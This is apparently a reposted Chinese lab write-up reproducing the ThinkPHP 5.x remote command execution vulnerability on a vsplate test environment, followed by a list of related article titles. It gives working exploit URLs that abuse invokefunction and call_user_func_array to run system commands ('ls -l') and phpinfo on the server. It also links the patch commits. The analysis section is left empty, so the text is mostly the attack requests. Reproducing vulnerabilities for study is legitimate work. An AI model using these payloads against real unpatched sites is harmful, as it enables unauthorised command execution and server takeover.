漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)相关的知识,希望对你有一定的参考价值。

0x00复现环境

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)

0x01步骤

  1. 点击start to hack 进入环境页面 run the project 然后访问给出的target address
    1.执行系统命令显示目录下文件 http://aaa.vsplate.me:52763/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
    技术分享图片

  2. 执行phpinfo
    http://aaa.vsplate.me/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20‘phpinfo();‘

想你所想,发挥创意

0x02漏洞原理分析

待分析

0x03漏洞分析

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

reference

http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

以上是关于漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP 5.x远程命令执行漏洞分析与复现

thinkphp5.x命令执行漏洞复现及环境搭建

ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现

ThinkPHP5 远程命令执行漏洞

Spring Framework 远程命令执行漏洞复现(CVE-2022-22965)

华为路由器远程命令执行漏洞复现(CVE-2017-17215)